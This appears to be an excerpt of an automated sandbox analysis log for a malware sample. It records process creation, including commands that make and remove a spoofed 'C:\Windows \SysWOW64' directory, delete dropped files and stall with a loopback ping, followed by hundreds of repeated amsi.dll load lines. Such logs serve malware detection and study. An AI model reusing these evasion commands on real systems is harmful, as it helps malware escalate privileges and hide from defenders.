            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
            Source: C:\Users\Public\alpha.pifProcess created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10Jump to behavior
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFProcess created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: C:\Users\Public\Libraries\Cobsfhiy.PIFProcess created: C:\Users\Public\Libraries\yihfsboC.pif C:\Users\Public\Libraries\yihfsboC.pif
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: url.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EPTMAcgvNZ.exeSection loaded: amsi.dllJump to behavior
